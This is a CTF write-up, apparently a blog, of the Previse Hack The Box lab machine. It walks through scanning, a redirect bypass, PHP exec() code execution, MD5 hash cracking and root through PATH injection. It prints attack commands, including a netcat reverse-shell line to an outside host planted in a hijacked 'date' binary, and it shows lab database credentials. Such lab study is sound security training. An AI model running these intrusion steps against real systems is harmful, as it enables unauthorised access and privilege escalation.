In this blog, we will cover the Previse HTB CTF challenge that is an easy machine. It is to Capture the flag types of CTF challenges. You will get to know a lot of learning in this CTF challenge. For example, Path Variable, Code Execution, Hashes Decrypting, etc.
Table of Content
Port Scanning (Nmap Tool)
Directory Scanning through Gobuster
Code Execution through PHP
Decrypt MD5 Hash using Hashcat
Read (User.txt )
Sudo Right withPATH Variable
As you know, we always do the first scan of the target network. Nmap may be the best tool for network scanning. To get more information regarding the Nmap command, Follow the below link.
nmap -sC -sV -oA nmap/previse 10.10.11.104
I found port 22 for SSH, Port 80 for HTTP are opened.
Previse website Index page looks like this.
In most of the challenging stages, we need directory scanning. The Kali Linux carries several directory scanning tools for the penetration tester. Gobuster is a popular directory scanning tool, and we will use this tool for directory scanning. Let’s follow the below command.
gobuster dir --url http://10.10.11.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o directory.log
We found /nav.php file on scan with gobuster tool, which doesn’t redirect to other pages. Let us open this file.
But as soon as we tried to open /account.php page, we got redirected to login.php. We intercepted requests from /account.php using BurpSuite. Follow the below image.
Let’s change the status code 302 to 200. “200 OK”
Excellent, we have found the page to create an account.
Let’s create an account.
Account creation was successful.
Let’s login with the latest credential.
We got a SITEBACKUP.zip file. Let’s download it.
We found two files quite interesting after unzipping.
Surprise, I have obtained the username and password of the database. note it.
user = “root”
password = “mySQL_p@ssw0rd!:)”
Returning to the page source code reviews searching for possible flaws was found the exec() function and it was possible to abuse it for code execution.
Let’s use Burp to intercept the request from /logs.php page and test the code execution… Successful!
Finally, we are ready for the reverse shell. Successful!
Finally, We are inside! Let’s log in to MySQL using the above credentials. If you have no idea. How Can I See List all Users In A MySQL Database Server? I think you should read the following blog.
We have got a username and password, but the password is in an encrypted format.
We used hashcat to decrypt the hash with rockyou.txt wordlist.
hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt
We used ssh to connect as an m4lwhere user. Login Successful. We got our first flag.
Now we need to escalate our privilege. Let’s type the command: sudo -l.
Let’s Analyze the /opt/scripts/access_backup.sh script, you can see that some commands/binaries are called directly and there may be the vulnerability of “path injection”.
I configured the environment variable in /tmp directory and created the “date” file containing a netcat command to return a reverse shell on port 9001.
echo "nc 10.10.14.4 9001 -e /bin/bash" > date
Let’s execute the following command.
We have received the reverse shell connection as root successfully!